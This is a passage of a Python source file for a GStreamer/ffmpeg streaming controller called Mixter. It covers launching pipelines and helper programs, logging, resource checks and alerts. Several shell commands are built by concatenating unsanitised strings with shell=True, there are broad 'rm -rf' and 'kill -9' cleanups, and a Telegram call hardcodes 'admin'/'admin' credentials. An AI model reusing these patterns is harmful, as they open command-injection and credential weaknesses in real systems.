settings\n\t\tself.load_settings()\n\t\tself.pipeline_number = 0\n\t\tself.pipelines = {}\n\t\tself.pipelines_desc = {}\n\t\tself.busses = {}\n\t\t#delete all graphs, .dot and .png from folder\n\t\tsubprocess.call('rm -rf '+self.loaded_settings['gst_graph_path']+'*.dot ' +self.loaded_settings['gst_graph_path']+'*.png', shell=True)\n\t\tprint('delete ' + self.loaded_settings['gst_graph_path']+'*.dot') \n\t\t#only after we have the settings we can try to launch pipeline\n\t\tself.launch_pipeline()\n\n\n#################################\t\n# Settings\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef load_settings(self):\n\t\ttry:\n\t\t\tself.parsettings = parsettings(self.mixter_settings_path)\n\t\t\tself.loaded_settings = self.parsettings.loadSettings()\n\t\t\tself.log_message('[DEBUG] Configuraciones cargadas')\n\t\texcept:\n\t\t\tprint(\"MIXTER LOG: ERROR, no se pudo cargar el archivo de configuracion o se cargo con errores\")\n\t\t\tself.log_message('[ERROR] no se pudo cargar el archivo de configuracion o se cargo con errores')\n\n\t\t#activate gstreamer graphs\n\t\tos.environ[\"GST_DEBUG_DUMP_DOT_DIR\"] = self.loaded_settings['gst_graph_path']\n\t\tprint(\"MIXTER LOG: DEBUG, GST_DEBUG_DUMP_DOT_DIR : \" + os.environ['GST_DEBUG_DUMP_DOT_DIR'])\n\t\tself.log_message('[DEBUG] GST_DEBUG_DUMP_DOT_DIR : ' + os.environ['GST_DEBUG_DUMP_DOT_DIR'])\n\n\n#################################\t\n# Check external programs\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef launch_pipeline(self):\n\t\t#After settings are loaded, if auto_launch is On, we build gstreamer pipeline\n\t\tif self.loaded_settings['auto_launch']=='On':\n\t\t\t#before we launch gstreamer, we need to check additional applications, if they are On, like obplayer, brave\n\t\t\tself.log_message(\"[DEBUG] Auto_launch activo, se intentara lanzar tuberia\")\n\t\t\tprograms_to_launch={}\n\t\t\tif self.loaded_settings['obplayer'] == 'On':\n\t\t\t\tprograms_to_launch = ['obplayer']\n\t\t\tif self.loaded_settings['snowmix'] == 'On':\n\t\t\t\tprograms_to_launch.extend(['snowmix'])\n\t\t\tif self.loaded_settings['brave'] == 'On':\n\t\t\t\tprograms_to_launch.extend(['brave'])\n\n\t\t\tif len(programs_to_launch)!=0:\n\t\t\t\tself.log_message(\"[DEBUG] Se intentara lanzar \" + str(programs_to_launch))\n\t\t\t\tif self.launch_secondary_programs(programs_to_launch):\n\t\t\t\t\tprint(\"MIXTER LOG: Lanzados programas secundarios\")\n\t\t\t\t\tself.log_message(\"[DEBUG] Lanzados programas secundarios\")\n\t\t\t\t\t#FIXME do we want to check on them ?\n\t\t\t\t\t#self.check_input_and_build_pipeline()\n\t\t\t\t\tself.build_multiple_pipelines()\n\n\t\t\telse:\n\t\t\t\tself.build_multiple_pipelines()\n\t\t\t\t#self.reconnect()\n\n\t\telse:\n\t\t\tself.log_message(\"[DEBUG] Auto_launch desactivado, lanzar a mano\")\n\t\n\t#Launch external programs\n\tdef launch_secondary_programs(self,programs_to_launch):\n\t\tprograms_checked = len(programs_to_launch)\n\t\tall_programs_checked = True\n\t\t\n\t\tfor p in programs_to_launch:\n\t\t\tall_programs_checked = all_programs_checked and self.try_execute_program(p,5)\n\t\t\t#always restart brave the first time ?\n\t\treturn all_programs_checked\n\n\tdef try_execute_program(self,p,counter=5):\n\t\tif not self.check_process(p) and counter > 0:\n\t\t\tprint(\"MIXTER LOG: Intentando lanzar \" + p)\n\t\t\tself.log_message('[DEBUG] Intentando lanzar ' + p)\n\t\t\tself.execute_program(p)\n\t\t\t#FIXME sleep here is because process can exist, but the program is not yet sending streaming, we need to check when streaming is ok\n\t\t\ttime.sleep(3)\n\t\t\tif not self.check_process(p):\n\t\t\t\tcounter -= 1\n\t\t\t\tself.try_execute_program(p,counter)\n\t\t\t\treturn False\n\t\treturn True\n\n\n\n#################################\t\n# GSTREAMER build Pipelines \t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef build_multiple_pipelines(self):\n\t\tpipeline_list = json.loads(self.loaded_settings['pipeline_list'])\n\t\t#order matters\n\t\tpipeline_list_sorted = {}\n\t\tkeys_sorted = sorted(pipeline_list)\n\t\tfor n in pipeline_list:\n\t\t\tpipeline_list_sorted[n]=pipeline_list[n]\n\n\t\tfor n in pipeline_list_sorted:\n\t\t\t#print(pipeline_list[n])\n\t\t\tprint('MIXTER LOG: Building multiple pipelines')\n\t\t\tself.log_message('[DEBUG] Building multiple pipelines')\n\t\t\tprint('MIXTER LOG: Calling build_pipeline with: ' + str(pipeline_list_sorted[n]))\n\t\t\t#self.load_settings()\n\t\t\t#self.parsettings = parsettings(self.mixter_settings_path)\n\t\t\t#self.parsettings.saveSettings(pipeline_list[n])\n\t\t\t#self.load_settings()\n\t\t\tself.build_pipeline('',pipeline_list_sorted[n])\n\n\tdef build_pipeline(self,pipeline_text='',pipeline_settings=''):\n\t\tpipes = Pipes()\n\n\t\tif pipeline_text=='':\n\t\t\tif pipeline_settings=='':\n\t\t\t\tpipeline_settings = self.loaded_settings\n\n\t\tpipeline_number = self.pipeline_number\n\t\tself.pipelines_desc[pipeline_number] = {}\n\t\tself.pipelines_desc[pipeline_number]['pipeline_id'] = 'p_'+str(self.pipeline_number)\n\n\n\t\tif 'pipeline_type' in pipeline_settings and pipeline_settings['pipeline_type']=='ffmpeg':\n\t\t\tif not 'service_name' in pipeline_settings:\n\t\t\t\tpipeline_settings['service_name'] = 'Mixter service'\n\t\t\tself.ffmpeg_launch(pipes.ffmpeg_pipeline(pipeline_settings))\n\t\t\tself.pipelines_desc[pipeline_number]['pipeline_text'] = str(pipes.ffmpeg_pipeline(pipeline_settings))\n\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = pipeline_settings\n\t\t\tself.pipelines_desc[pipeline_number]['pid'] = self.ffmpeg_pid\n\n\t\telse:\n\t\t\tif pipeline_text=='':\n\t\t\t\tif pipeline_settings['output_type']=='shm_sink' and pipeline_settings['input_1_type']=='shm_1_src':\n\t\t\t\t\t#FIXME when we lauch a pipeline not using gst.parse.launch we still need to control it\n\t\t\t\t\tprint('launched continuity.py from http_server')\n\t\t\t\t\tself.CONTINUITY = Continuity()\n\t\t\t\t\tself.pill2kill = threading.Event()\n\t\t\t\t\tself.threadCA = threading.Thread(target=self.CONTINUITY.main, args=(pipeline_settings,))\n\t\t\t\t\tself.threadCA.setDaemon(False)\n\t\t\t\t\tself.threadCA.start()\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = {\"pipeline_name\":\"CONTINUITY\",\"input_1_type\":\"shm_1_src\",\"output_type\":\"shm_sink\",\"input_2_type\": \"none_2_src\",\"pipeline_type\": \"gstreamer\",\"video_sink\": pipeline_settings['video_sink'], \"audio_sink\":pipeline_settings['audio_sink'],\"color_format_sink\":pipeline_settings['color_format_sink']}\n\t\t\t\telse:\n\t\t\t\t\tself.pipelines[pipeline_number] = Gst.parse_launch(pipes.pipe_to_launch(pipeline_settings))\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_text'] = str(pipes.pipe_to_launch(pipeline_settings))\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = pipeline_settings or self.settings_string_to_array(pipes.get_settings_needed())\n\t\t\t\t\tself.connect_bus(pipeline_number)\n\t\t\t\tprint(\"MIXTER LOG: Lanzando desde: \" + pipeline_settings['input_1_type'] + \" hasta: \" + pipeline_settings['output_type'])\n\t\t\t\tself.log_message('[DEBUG] Lanzando desde: ' + pipeline_settings['input_1_type'] + \" hasta: \" + pipeline_settings['output_type'])\n\t\t\telse:\n\t\t\t\tself.pipelines[pipeline_number] = Gst.parse_launch(pipeline_text)\n\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_text'] = str(pipeline_text)\n\t\t\t\tif pipeline_settings=='':\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = {\"pipeline_name\":\"from text\",\"input_1_type\":\"unknown\",\"output_type\":\"unknown\"}\n\t\t\t\telse:\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = pipeline_settings\n\t\t\t\tself.connect_bus(pipeline_number)\n\n\n\t\tself.pipeline_number += 1\n\n\tdef connect_bus(self,pipeline_number):\n\t\t#Lanzar la tuberia y conectarse al bus\n\t\tself.busses[pipeline_number] = self.pipelines[pipeline_number].get_bus()\n\t\tself.busses[pipeline_number].add_signal_watch()\n\t\tself.busses[pipeline_number].enable_sync_message_emission()\n\t\tself.busses[pipeline_number].connect(\"message\", self.on_message, pipeline_number)\n\t\tself.busses[pipeline_number].connect(\"sync-message::element\", self.on_sync_message)\n\t\tself.busses[pipeline_number].connect(\"sync-message::stream-status\", self.on_stream_message)\n\n\t\tself.pipelines[pipeline_number].set_name('p_'+str(self.pipeline_number))\n\t\tprint('MIXTER LOG: Tuberia construida, bus conectado')\n\t\tself.log_message('[DEBUG] Pipeline: Tuberia construida, bus conectado ' + str(self.pipelines[pipeline_number].get_name()))\t\n\t\t#latencia \n\t\tself.latency = self.pipelines[pipeline_number].get_latency()\n\t\tprint('MIXTER LOG: Latencia ' + str(self.latency))\n\n\t\tself.pipelines[pipeline_number].set_state(Gst.State.PLAYING)\n\t\t#TODO this is not the best way to check pipeline state\n\t\tself.gst_pipeline_state = 'PLAYING'\n\t\tprint('MIXTER LOG: GST state ' + self.gst_pipeline_state)\n\t\tself.log_message('[DEBUG] GST state ' + self.gst_pipeline_state)\n\n\t\t#self.pipelines_desc[pipeline_number]['pipeline_id'] = str(self.pipelines[pipeline_number].get_name())\n\n\t\t#self.pipelines_desc[pipeline_number]['pipeline_settings_used'] = pipeline_settings or self.settings_string_to_array(pipes.get_settings_needed())\n\t\t#gstreamer graphs\n\t\tGst.debug_bin_to_dot_file(self.pipelines[pipeline_number],Gst.DebugGraphDetails(15),self.pipelines_desc[pipeline_number]['pipeline_id'])\n\t\tself.dot_to_png(self.pipelines_desc[pipeline_number]['pipeline_id'])\n\n\n\tdef ffmpeg_launch(self,ffmpeg_pipeline):\n\t\tprint(' ffmpeg_pipeline: ' +str(ffmpeg_pipeline))\n\t\t#self.kill_ffmpeg()\n\t\tffmpeg_tcp = subprocess.Popen(self.loaded_settings['ffmpeg_path']+\"/ffmpeg \"+ffmpeg_pipeline, shell=True, stdout=subprocess.PIPE)\n\t\tself.ffmpeg_pid=int(ffmpeg_tcp.pid)\t\t\t\t\t\t\n\t\tprint(\"MIXTER LOG: UDP streaming with FFMPEG PID \"+str(self.ffmpeg_pid))\n\t\tself.log_message('[DEBUG] UDP streaming with FFMPEG PID '+str(self.ffmpeg_pid))\n\n\n#################################\t\n# Overlay\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\n\tdef toggle_overlay(self,imgdata):\n\t\t#self.load_settings()\n\t\tdata = json.loads(imgdata)\n\t\tpipeline_number = int(data['pipeline_number'])\n\t\toverlay_id = str(data['id'])\n\t\toverlay_src = str(data['src'])\n\t\tsvgoverlay = self.pipelines[pipeline_number].get_by_name('svgoverlay'+overlay_id)\n\t\tsvgoverlay.set_property('location', overlay_src)\n\n\tdef toggle_textoverlay(self,string):\n\t\t#self.load_settings()\n\t\t#textoverlay.connect('draw', self.on_draw,string)\n\t\tself.cairotextstring = str(string)\n\t\t#data = string.decode('UTF-8')\n\t\tdata = json.loads(string)\n\t\tself.cairotextstring = str(data['string'])\n\t\tself.cairotextmove_to_x = int(data['move_to_x'])\n\t\tself.cairotextmove_to_y = int(data['move_to_y'])\n\t\tself.cairotextfont_size = int(data['font_size'])\n\n\t\tpipeline_number = int(data['pipeline_number'])\n\t\ttextoverlay = self.pipelines[pipeline_number].get_by_name('textoverlay')\n\t\ttextoverlay.connect('draw', self.on_draw)\n\n\n\tdef on_draw(self, _overlay, context, _timestamp, _duration):\n\t\t\"\"\"Each time the 'draw' signal is emitted\"\"\"\n\t\tcontext.select_font_face('Open Sans', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)\n\t\tcontext.set_font_size(self.cairotextfont_size)\n\t\tcontext.move_to(self.cairotextmove_to_x,self.cairotextmove_to_y)\n\t\tcontext.text_path(self.cairotextstring)\n\t\tcontext.set_source_rgb(1, 1, 1)\n\t\tcontext.fill_preserve()\n\t\tcontext.set_source_rgb(0, 0, 0)\n\t\tcontext.set_line_width(1)\n\t\tcontext.stroke()\n\n\n#################################\t\n# GST-messages\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef on_message(self, bus, message, pipeline_number):\n\t\t#print(\"MIXTER LOG message: Mensaje de GST recibido\")\n\t\tt = message.type\n\t\tif t == Gst.MessageType.EOS:\n\t\t\tself.log_message(\"[ERROR] EOS from pipeline_\"+ str(pipeline_number))\t\n\t\t\tself.reconnect(pipeline_number)\n\t\telif t == Gst.MessageType.ERROR:\n\t\t\tself.reconnect(pipeline_number)\n\t\t\terr, debug = message.parse_error()\n\t\t\terror=\"Error: %s\" % err, debug\n\t\t\tprint(\"MIXTER LOG message: Error:\" + str(error))\n\t\t\tself.log_message(\"[ERROR] from pipeline_\"+ str(pipeline_number)+' '+ str(error))\n\t\t\tself.handle_msg(debug)\n\t\t\t\n\t\telif t == Gst.MessageType.BUFFERING:\n\t\t\tpercent = message.parse_buffering()\n\t\t\tif percent > 60:\n\t\t\t\tprint(\"MIXTER LOG message: Porcentaje de buffering (imprimir solo mas de 60%): \" + str(percent))\n\t\t\t\tself.log_message(\"[BUFFER] Porcentaje: \"+ str(percent))\t\n\t\t\n\t\telif t == Gst.MessageType.ELEMENT:\n\t\t\tmsg = message.get_structure()\n\t\t\tmsgstr=str(msg.get_name())\n\t\t\t#Recibir mensaje cada vez que se genera un nuevo fichero (cuando finaliza la escritura)\n\t\t\tif msgstr==\"GstMultiFileSink\":\t\n\t\t\t\tprint(\"MIXTER LOG: Nuevo fichero\")\n\t\t\t\tfilename=(message.get_structure().get_string(\"filename\"))\n\t\t\t\tnew_filename=int(int(time.time())-(int(self.loaded_settings['file_duration'])/1000000000))\n\t\t\t\t#timestamp gives local time, we have to calculate difference between UTC and local\n\t\t\t\ttimestamp_epoch = self.timestamp_at_midnight(new_filename)\n\t\t\t\t#crear una carpeta para guardar el fichero y otra para los thumbs\n\t\t\t\tsubprocess.Popen(\"mkdir -p \"+self.loaded_settings['file_path']+timestamp_epoch+\"/thumbs\", shell=True, stdout=subprocess.PIPE)\n\t\t\t\tnew_filename=str(new_filename)\n\t\t\t\tlong_path = self.loaded_settings['file_path']+'/'+timestamp_epoch+'/'\n\t\t\t\tnew_filename = long_path+new_filename+\".mp4\"\n\t\t\t\t#subprocess.Popen(\"mv \"+filename+\" \"+new_filename, shell=True, stdout=subprocess.PIPE)\n\t\t\t\t#Reparar fichero y moverlo ¿ -bsf:a aac_adtstoasc ? y #Crear un thumbnail cada hora y guardarlo en almacenamiento\n\t\t\t\tsubprocess.Popen(\"ffmpeg -probesize 100M -analyzeduration 100M -i \"+filename+\" -c copy -movflags +faststart -bsf:a aac_adtstoasc \"+new_filename+\"; ffmpeg -probesize 100M -analyzeduration 100M -i \"+new_filename+\" -vf fps=1/3600 \"+long_path+\"thumbs/thumb%03d.jpg\", shell=True, stdout=subprocess.PIPE)\n\t\t\t\t\n\t\t\t\tprint(\"MIXTER LOG: Intentando crear fichero y thumbs: \" + new_filename)\n\t\t\t\tself.log_message(\"[DEBUG] Intentando crear fichero y thumbs: \" + new_filename)\n\n\tdef on_sync_message(self, bus, message):\n\t\tt = message.type\n\t\tif t == Gst.MessageType.BUFFERING:\n\t\t\tpercent = message.parse_buffering()\n\t\t\tif percent > 66:\n\t\t\t\tprint(\"MIXTER LOG sync: Porcentaje de buffering (imprimir solo mas de 66%): \" +str(percent))\n\t\t\t\tself.log_message(\"[BUFFER] (sync) Porcentaje: \"+ str(percent))\n\n\tdef on_stream_message(self, bus, message):\n\t\ttype, owner = message.parse_stream_status()\n\t\tr = \"STREAM: %s\" % type, owner\n\t\t#print(\"MIXTER LOG message: Stream status\" + str(r))\n\t\t#TODO definir niveles de log\n\t\t#self.log_message(\"[STREAMING] \" + str(r))\n\n\t#Manejar mensajes, sobre todo de error. Actuar de diferente manera segun sea el error, desactivando componentes o lo que convenga en cada caso\n\tdef handle_msg(self, msg):\n\t\tif msg.find(\"Could not connect to RTMP stream\") != -1:\n\t\t\tself.total_errors+=1\n\t\t\tprint('MIXTER LOG: No se puede conectar por RTMP. Comprobar configuracion ' + str(self.total_errors))\n\t\t\tself.log_message(\"[ERROR] : No se puede conectar por RTMP. Comprobar configuracion\")\n\t\t\t#time.sleep(4)\n\t\t\tif self.total_errors>=5:\n\t\t\t\tprint('MIXTER LOG: demasiados intentos, se desactiva RMTP')\n\t\t\t\tself.log_message(\"[ERROR] : demasiados intentos, se desactiva RMTP\")\n\t\t\t\tself.send_email('[ERROR] : demasiados intentos, se desactiva RMTP')\n\t\t\t\tself.loaded_settings['rtmp']='Off'\n\t\t\t\t#TODO lanzar un script que compruebe el estado del RTMP\n\n\n\n#################################\t\n# Methods\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\t#TODO not the best way to do it and should return PLAYING, NULL, PAUSED...\n\tdef check_pipeline_status(self):\n\t\tif self.gst_pipeline_state == 'PLAYING':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t\"\"\" \n\tdef kill_ffmpeg(self):\n\t\t#FIXME detectar mejor solo el proceso que queremos matar de FFMPEG\n\t\tsubprocess.call(\"killall ffmpeg\", shell=True)\n\t\tif self.ffmpeg_pid!=0:\n\t\t\tprint(\"MIXTER LOG: Trying to kill FFMPEG...\"+str(self.ffmpeg_pid))\n\t\t\tself.log_message('[DEBUG] Trying to kill FFMPEG ...'+str(self.ffmpeg_pid))\n\t\t\t#subprocess.call(\"kill -9 \"+str(self.ffmpeg_pid), shell=True)\n\t\t\tself.ffmpeg_pid = 0\n\t\telse:\n\t\t\tprint(\"MIXTER LOG: FFMPEG no se esta ejecutando\")\n\t\t\tself.log_message('[DEBUG] FFMPEG no se esta ejecutando')\n\t\"\"\"\n\n\tdef log_message(self, message):\n\t\tfile_log = open(self.loaded_settings['log_path']+'/mixter.log','a')\n\t\tfile_log.write('['+ datetime.datetime.now().strftime(\"%A, %d. %B %Y %H:%M%p:%S%p\")+']' + message + '\\n') \n\t\tfile_log.close()\n\t\t#Acortar mensaje\n\t\t#message = message[0:80]\n\t\tif len(self.log_window_message.split('\\n'))>10:\n\t\t\tlogs_splited=self.log_window_message.split('\\n',1)[1]\n\t\t\tself.log_window_message=str(logs_splited)\n\t\tself.log_window_message += '['+ datetime.datetime.now().strftime(\"%A, %d. %B %Y %H:%M%p:%S%p\")+']' + message + '\\n'\n\t\ttry:\n\t\t\tself.log_window.set_text(self.log_window_message)\n\t\texcept:\n\t\t\tpass\n\n\n\tdef disconnect(self, n, m=0):\n\t\tGtk.main_quit()\n\n\t#El check solo tiene que devolver el valor, otra funcion se encargara de actuar en consecuencia\n\tdef check_shm(self):\n\t\tmem_available = subprocess.Popen(\"df -k /dev/shm/ | awk 'NR==2 {print $4}'\", shell=True, stdout=subprocess.PIPE)\n\t\tmem_available = int(mem_available.stdout.read())\n\t\treturn mem_available\n\t\n\tdef check_ram(self):\n\t\tmem_available = subprocess.Popen(\"free | awk 'NR==2 {print $3}'\", shell=True, stdout=subprocess.PIPE)\n\t\tmem_available = int(mem_available.stdout.read())\n\t\treturn mem_available\n\t#FIXME MAL HECHO, esto da falsos positivos probablemente hay que pasar el resultado a FLOAT\n\tdef check_cpu(self):\n\t\tcpu_usage = subprocess.Popen(\"uptime | grep -ohe 'load average[s:][: ].*' | awk '{ print $3}' | sed -s 's/,$//gi'\", shell=True, stdout=subprocess.PIPE)\n\t\t#para sacar solo entero:\" uptime | grep -ohe 'load average[s:][: ].*' | awk '{ print substr ($3, 0, 1)}'\"\n\t\tcpu_usage = cpu_usage.stdout.read().decode(\"utf-8\").rstrip()\n\t\tcores_number = subprocess.Popen(\"nproc\", shell=True, stdout=subprocess.PIPE)\n\t\tcores_number = cores_number.stdout.read().decode(\"utf-8\").rstrip()\n\t\tif cpu_usage[0:1]>=cores_number:\n\t\t\tprint(\"MIXTER LOG: Uso de CPU elevado, Intentando relanzar Obplayer y Snowmix\")\n\t\t\tself.log_message(\"[WARNING] Uso de CPU elevado, Intentando matar y relanzar Obplayer y Snowmix\")\n\t\t\t#self.send_email(\"[WARNING] Uso de CPU elevado, Intentando matar y relanzar Obplayer y Snowmix\")\n\t\t\tprint(\"MIXTER LOG: Desactivado el reinicio por uso de CPU elevado\")\n\t\t\tself.log_message(\"[WARNING] Desactivado el reinicio por uso de CPU elevado\")\n\t\t\t#self.restart_all(1)\n\t\treturn cpu_usage+'/'+cores_number\n\t\t\n\n\tdef check_shm_and_restart(self):\n\t\tmem_available = self.check_shm()\n\t\tif mem_available < 1000000:\n\t\t\tprint(\"MIXTER LOG: WARNING, Memoria compartida a punto de rebasar, disponible solo: \" + str(mem_available))\n\t\t\tself.log_message(\"[WARNING] Memoria compartida a punto de rebasar, disponible solo: \" + str(mem_available))\t\t\t\n\t\t\t#Si el mem_available es menor que X borrar /dev/shm y relanzar todo\n\t\t\tself.restart_all(1)\t\n\t\t\t#print(\"MIXTER LOG: DESACTIVADO EL REINICIO POR FALTA DE SHM\")\n\t\telse:\n\t\t\tprint(\"MIXTER LOG: Memoria compartida disponible: \" + str(mem_available))\n\n\t#dado el nombre de un proceso, verificar si existe\n\tdef check_process(self,process):\n\t\tif process == 'brave':\n\t\t\ttry:\n\t\t\t\trequest = requests.get(self.loaded_settings['brave_path']+'/api/outputs', data='',timeout=1);\n\t\t\t\tif request.status_code == 200:\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\t\texcept:\n\t\t\t\treturn False\n\n\t\tprocess_check = subprocess.call('ps -U `whoami` | grep \"'+process+'\"', shell=True)\n\t\tif process_check==1:\n\t\t\treturn False\n\t\telse:\n\t\t\t# meter el proceso en el array de procesos y hacerlo solo con los del usuario\n\t\t\tprocess_pid = subprocess.Popen(\"ps -U `whoami` | grep \"+process+\" | awk 'NR==1{ print $1}'\", shell=True, stdout=subprocess.PIPE)\n\t\t\tprocess_pid = process_pid.stdout.read().decode(\"utf-8\").rstrip()\t\n\t\t\tif not process_pid in self.processes:\n\t\t\t\tself.processes.extend([process_pid])\n\t\t\treturn True\n\n\tdef execute_program(self,program):\n\t\tself.log_message(\"[DEBUG] Ejecutando \" + program)\n\t\tprint('MIXTER LOG: Ejecutando ' + program)\n\n\t\tif self.check_process(program):\n\t\t\tself.log_message(\"[DEBUG] \"+program+\" deberia estar funcionando\")\n\t\t\tprint('MIXTER LOG: '+program+' deberia estar funcionando')\n\t\telse:\n\t\t\tif program == 'snowmix':\n\t\t\t\ttry:\n\t\t\t\t\t#subprocess.call(\"/usr/local/lib/Snowmix-0.5.1/scripts/obplayer\", shell=True)\n\t\t\t\t\tfile_log = open(self.loaded_settings['log_path']+'/snowmix.log','a')\n\t\t\t\t\tp = subprocess.Popen(\"/bin/bash /usr/local/lib/Snowmix-0.5.1/scripts/obplayer\", shell=True, stdout=file_log)\n\t\t\t\t\tfile_log.close()\n\t\t\t\t\t#we need to wait for the snowmix/obplayer script to finish\n\t\t\t\t\ttime.sleep(5)\n\t\t\t\texcept:\n\t\t\t\t\tself.log_message(\"[ERROR] snowmix no pudo ejecutarse\")\n\t\t\t\t\tprint('MIXTER LOG: snowmix no pudo ejecutarse')\n\n\t\t\telif program == 'obplayer':\n\t\t\t\ttry:\n\t\t\t\t\tsubprocess.Popen(self.loaded_settings['obplayer_path'], shell=True, stdout=subprocess.PIPE)\n\t\t\t\t\t#subprocess.Popen(args=['gnome-terminal', '--' ,self.loaded_settings['obplayer_path']])\t\n\t\t\t\texcept:\n\t\t\t\t\t#subprocess.Popen(args=['xterm', '-e' , self.loaded_settings['obplayer_path']])\n\t\t\t\t\t#subprocess.Popen(self.loaded_settings['obplayer_path'])\n\t\t\t\t\tprint('MIXTER LOG: unable to launch '+program)\n\n\t\t\telif program == 'brave':\n\t\t\t\ttry:\n\t\t\t\t\tself.restart_brave()\n\t\t\t\texcept:\n\t\t\t\t\tself.log_message(\"[ERROR] brave no pudo reiniciarse\")\n\t\t\t\t\tprint('MIXTER LOG: brave no pudo reiniciarse')\n\n\tdef restart_brave(self):\n\t\tprint('MIXTER LOG: Restarting brave...')\n\t\tself.log_message(\"[DEBUG] Restarting brave...\")\n\t\trequests.post(self.loaded_settings['brave_path']+'/api/restart', data= '{\"config\":\"current\"}');\n\n\tdef cleanup_tmp(self, widget):\n\t\tprint('MIXTER LOG: Eliminando archivos temporales...')\n\t\tself.log_message(\"[DEBUG] Eliminando archivos temporales...\")\n\t\tsubprocess.call('rm -rf /tmp/audio* /tmp/video* /tmp/mixer* /tmp/mixter* /tmp/feed* /tmp/audioSn* /tmp/brave*', shell=True)\n\n\tdef cleanup_shm(self, widget):\n\t\tprint('MIXTER LOG: Eliminando archivos temporales y vaciando /dev/shm...')\n\t\tself.log_message(\"[DEBUG] Eliminando archivos temporales y vaciando /dev/shm...'\")\n\t\t#DANGEROUS! be carefull with other users\n\t\tsubprocess.call('rm -rf /dev/shm/shm*', shell=True)\n\n\tdef flush(self, widget):\n\t\tnow=datetime.datetime.now().strftime(\"%Y%m%d-%H_%M%p\")\n\t\tprint('MIXTER LOG: Renombrando mixterlog a mixterlog-'+now+' ...')\n\t\tself.log_message(\"[DEBUG] Flush log: Log cerrado \"+now)\n\t\tsubprocess.call('mv '+self.loaded_settings['log_path']+'/mixter.log '+self.loaded_settings['log_path']+'/'+now+'.mixter.log', shell=True)\n\t\tprint('MIXTER LOG: Renombrando mixterlog a mixterlog-'+now+' ...')\n\t\tself.log_message(\"[DEBUG] Flush log: Log anterior cerrado en \"+now+\" .mixter.log\")\n\n\tdef kill_process(self,pid):\n\t\tprint('MIXTER LOG: Trying to kill process ' + pid)\n\t\tself.log_message(\"[WARNING] Trying to kill process \" + pid)\n\t\tself.processes.remove(pid)\n\t\tsubprocess.call(\"kill -9 \"+pid, shell=True)\n\n\t##TODO killall and restart, new way\n\tdef clean_kill_and_restart(self):\n\t\tprint('MIXTER LOG: Trying to clean and restart everything')\n\t\tself.log_message(\"[WARNING] *******Trying to clean and restart everything*******\")\n\t\tself.kill_all_pipelines()\n\t\tself.cleanup_tmp(1)\n\t\tself.cleanup_shm(1)\n\t\tfor process in self.processes:\n\t\t\tself.kill_process(process)\n\n\t\tif self.loaded_settings['snowmix'] == 'On':\n\t\t\tsubprocess.call(\"killall obplayer2feed output2shmsink output2shmsink_seba wish\", shell=True)\n\n\t\tif self.loaded_settings['brave'] == 'On':\n self.restart_brave()\n self.launch_pipeline()\n\n#################################\t\n# Notification channels\t\t\t#\n#\t\t\t \t\t\t\t#\n#################################\n\n\tdef send_email(self, message):\n\t\ttry:\n\t\t\tsubprocess.call('python3 '+self.mixter_path+'/sendemail.py '+ message, shell=True)\n\t\t\tprint('MIXTER LOG: email enviado')\n\t\t\tself.log_message(\"[DEBUG] email enviado\")\n\t\texcept:\n\t\t\tprint('MIXTER LOG: No se pudo enviar email de alerta, comprobar el archivo de settings')\n\t\t\tself.log_message(\"[ERROR] No se pudo enviar email de alerta, comprobar el archivo de settings\")\n\n\tdef send_telegram_msg(self, message):\n\t\ttry:\n\t\t\trequests.post(self.loaded_settings['telegram_notifications'], data='{\"user\":\"admin\",\"pass\":\"admin\",\"msg\":\"'+message+'\"}'); \n\t\t\tprint('MIXTER LOG: mensaje Telegram enviado')\n\t\t\tself.log_message(\"[DEBUG] mensaje Telegram enviado\")\n\t\texcept:\n\t\t\tprint('MIXTER LOG: No se pudo enviar mensaje Telegram de alerta, comprobar el archivo de settings')\n\t\t\tself.log_message(\"[ERROR] No se pudo enviar mensaje Telegram de alerta, comprobar el archivo de settings\")\n\t\t\n#################################\t\n# Helpers\t\t\t\t\t\t#\n#\t\t\t \t\t\t\t#\n#################################\n\t#Return epoch at 00:00 of the local date\n\tdef timestamp_at_midnight(self, time_to_convert=time.time()):\n\t\ttime_to_convert = int(time_to_convert)\n\n\t\ttimestamp_UTC = int(datetime.datetime.utcfromtimestamp(time_to_convert).timestamp())\n\t\ttimestamp_LOCAL = int(datetime.datetime.fromtimestamp(time_to_convert).timestamp())\n\t\ttime_difference = timestamp_LOCAL - timestamp_UTC\n\n\t\ttimestamp_epoch = int(int(timestamp_LOCAL) + int(time_difference))\n\n\t\tyear_UTC = int(datetime.datetime.utcfromtimestamp(timestamp_epoch).strftime('%Y'))\n\t\tmonth_UTC = int(datetime.datetime.utcfromtimestamp(timestamp_epoch).strftime('%m'))\n\t\tday_UTC = int(datetime.datetime.utcfromtimestamp(timestamp_epoch).strftime('%d'))\n\n\t\ttimestamp_at_midnight_UTC = int(int(datetime.datetime(year_UTC,month_UTC,day_UTC,(0)).timestamp() + int(time_difference)) )\n\n\t\treturn str(timestamp_at_midnight_UTC)\n\n\n\tdef settings_string_to_array(self,settings_list):\n\t\tsettings_used = {}\n\t\tfor n in settings_list:\n\t\t\tsettings_used[n]=self.loaded_settings[n]\n\t\treturn settings_used\n\n#################################\t\n# Pipeline handlers\t\t\t\t#\n#\t\t\t \t\t\t#\n#################################\n\tdef get_pipelines(self):\n\t\treturn self.pipelines_desc\n\n\tdef kill_pipeline(self,pipeline_number):\n\t\tprint('MIXTER LOG: trying to kill pipeline ' + str(pipeline_number))\n\t\tpipeline_name = self.pipelines_desc[pipeline_number]['pipeline_settings']['pipeline_name']\n\t\tprint(pipeline_name)\n\t\tif 